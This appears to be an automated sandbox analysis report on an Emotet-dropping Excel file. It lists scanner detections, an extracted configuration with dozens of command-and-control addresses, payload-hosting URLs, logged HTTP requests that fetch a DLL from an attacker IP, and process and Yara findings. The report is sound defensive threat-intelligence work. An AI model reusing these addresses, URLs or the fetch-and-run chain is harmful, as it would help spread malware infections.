                            Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3Avira URL Cloud: Label: malware
                            Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/Avira URL Cloud: Label: malware
                            Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.htmlAvira URL Cloud: Label: malware
                            Found malware configuration
                            Source: 12.2.rundll32.exe.1b0000.1.unpackMalware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
                            Multi AV Scanner detection for submitted file
                            Source: CJ68000754184.xlsVirustotal: Detection: 13%Perma Link
                            Source: CJ68000754184.xlsReversingLabs: Detection: 18%
                            Multi AV Scanner detection for domain / URL
                            Source: hostfeeling.comVirustotal: Detection: 10%Perma Link
                            Machine Learning detection for dropped file
                            Source: C:\ProgramData\JooSee.dllJoe Sandbox ML: detected
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: Binary string: >ystem.pdbW source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,

                            Software Vulnerabilities

                            barindex
                            Document exploit detected (process start blacklist hit)
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80
                            Source: global trafficDNS query: name: hostfeeling.com
                            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80

                            Networking

                            barindex
                            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                            Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.172:80
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorIPs: 160.16.102.168:80
                            Source: Malware configuration extractorIPs: 131.100.24.231:80
                            Source: Malware configuration extractorIPs: 200.17.134.35:7080
                            Source: Malware configuration extractorIPs: 207.38.84.195:8080
                            Source: Malware configuration extractorIPs: 212.237.56.116:7080
                            Source: Malware configuration extractorIPs: 58.227.42.236:80
                            Source: Malware configuration extractorIPs: 104.251.214.46:8080
                            Source: Malware configuration extractorIPs: 158.69.222.101:443
                            Source: Malware configuration extractorIPs: 192.254.71.210:443
                            Source: Malware configuration extractorIPs: 46.55.222.11:443
                            Source: Malware configuration extractorIPs: 45.118.135.203:7080
                            Source: Malware configuration extractorIPs: 107.182.225.142:8080
                            Source: Malware configuration extractorIPs: 103.75.201.2:443
                            Source: Malware configuration extractorIPs: 104.168.155.129:8080
                            Source: Malware configuration extractorIPs: 195.154.133.20:443
                            Source: Malware configuration extractorIPs: 159.8.59.82:8080
                            Source: Malware configuration extractorIPs: 110.232.117.186:8080
                            Source: Malware configuration extractorIPs: 45.142.114.231:8080
                            Source: Malware configuration extractorIPs: 41.76.108.46:8080
                            Source: Malware configuration extractorIPs: 203.114.109.124:443
                            Source: Malware configuration extractorIPs: 50.116.54.215:443
                            Source: Malware configuration extractorIPs: 209.59.138.75:7080
                            Source: Malware configuration extractorIPs: 185.157.82.211:8080
                            Source: Malware configuration extractorIPs: 164.68.99.3:8080
                            Source: Malware configuration extractorIPs: 162.214.50.39:7080
                            Source: Malware configuration extractorIPs: 138.185.72.26:8080
                            Source: Malware configuration extractorIPs: 178.63.25.185:443
                            Source: Malware configuration extractorIPs: 51.15.4.22:443
                            Source: Malware configuration extractorIPs: 81.0.236.90:443
                            Source: Malware configuration extractorIPs: 216.158.226.206:443
                            Source: Malware configuration extractorIPs: 45.176.232.124:443
                            Source: Malware configuration extractorIPs: 162.243.175.63:443
                            Source: Malware configuration extractorIPs: 212.237.17.99:8080
                            Source: Malware configuration extractorIPs: 45.118.115.99:8080
                            Source: Malware configuration extractorIPs: 129.232.188.93:443
                            Source: Malware configuration extractorIPs: 173.214.173.220:8080
                            Source: Malware configuration extractorIPs: 178.79.147.66:8080
                            Source: Malware configuration extractorIPs: 176.104.106.96:8080
                            Source: Malware configuration extractorIPs: 51.38.71.0:443
                            Source: Malware configuration extractorIPs: 173.212.193.249:8080
                            Source: Malware configuration extractorIPs: 217.182.143.207:443
                            Source: Malware configuration extractorIPs: 212.24.98.99:8080
                            Source: Malware configuration extractorIPs: 159.89.230.105:443
                            Source: Malware configuration extractorIPs: 79.172.212.216:8080
                            Source: Malware configuration extractorIPs: 212.237.5.209:443
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 20:18:49 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.27X-Powered-By: PHP/7.4.27Set-Cookie: 61f44fa975c8c=1643401129; expires=Fri, 28-Jan-2022 20:19:49 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:18:49 GMTExpires: Fri, 28 Jan 2022 20:18:49 GMTContent-Disposition: attachment; filename="KfCx9N.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
                            Source: Joe Sandbox ViewASN Name: S-NET-ASPL S-NET-ASPL
                            Source: Joe Sandbox ViewIP Address: 195.154.133.20 195.154.133.20
                            Source: Joe Sandbox ViewIP Address: 185.157.82.211 185.157.82.211
                            Source: unknownNetwork traffic detected: IP country count 21
                            Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.11
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172
                            Source: mshta.exe, 00000004.00000002.445696631.0000000000396000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.441775503.00000000002F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.445492110.000000000029E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.html
                            Source: CJ68000754184.xls.0.drString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlB
                            Source: mshta.exe, 00000004.00000002.445452336.0000000000260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlWinSta0
                            Source: mshta.exe, 00000004.00000002.445492110.000000000029E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.html_
                            Source: mshta.exe, 00000004.00000002.445492110.000000000029E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlb
                            Source: mshta.exe, 00000004.00000003.420330399.00000000002E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmld
                            Source: mshta.exe, 00000004.00000003.423260829.00000000032DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlfunction
                            Source: mshta.exe, 00000004.00000003.422456833.00000000032D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
                            Source: mshta.exe, 00000004.00000002.446063365.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmll
                            Source: mshta.exe, 00000004.00000002.445452336.0000000000260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlmshta
                            Source: mshta.exe, 00000004.00000002.445509209.00000000002BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443936246.00000000002B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlngs
                            Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.p
                            Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.png
                            Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.pngPE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://activetraining.sytes.net/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://activetraining.sytes.net/libraries/8s/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://activetraining.sytes.net/libraries/8s/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bimesarayenovin.ir/wp-adm
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.suk
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.sukoburu-secure.com
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gardeningfilm.com/wp-cont
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com/wp-admin/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://it-o.biz/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://it-o.biz/bitrix/xoDdDe/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://it-o.biz/bitrix/xoDdDe/PE3
                            Source: powershell.exe, 00000006.00000002.685196853.00000000037CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id/asset
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maxtdeveloper.com/okw9yx/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://totalplaytuxtla.com/sitio
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inablr.com/elenctic/f
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
                            Source: powershell.exe, 00000006.00000002.677562211.00000000002AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                            Source: powershell.exe, 00000006.00000002.677314579.0000000000260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://w
                            Source: powershell.exe, 00000006.00000002.677562211.00000000002AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                            Source: mshta.exe, 00000004.00000003.420738023.0000000003A2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
                            Source: mshta.exe, 00000004.00000002.446348661.0000000003CAA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/
                            Source: mshta.exe, 00000004.00000003.441443397.0000000003AAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420217264.0000000003AAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446302477.0000000003AAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/ll
                            Source: mshta.exe, 00000004.00000003.441588224.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446294886.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420167396.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443804667.0000000003A9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/r
                            Source: mshta.exe, 00000004.00000003.420287820.0000000003A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.comP
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gudangtasorichina.com/wp
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-eg.com/mlzkir/9
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-eg.com/mlzkir/97v/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-eg.com/mlzkir/97v/PE3
                            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htmJump to behavior
                            Source: unknownDNS traffic detected: queries for: hostfeeling.com
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10012C30 _memset,connect,_strcat,send,recv,
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: mshta.exe, 00000004.00000003.441733787.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443968366.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420316419.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.445522967.00000000002CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000003.441733787.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443968366.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420316419.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.445522967.00000000002CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

                            E-Banking Fraud

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 10.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4b0000.3.unpack, type: UNPACKEDPE
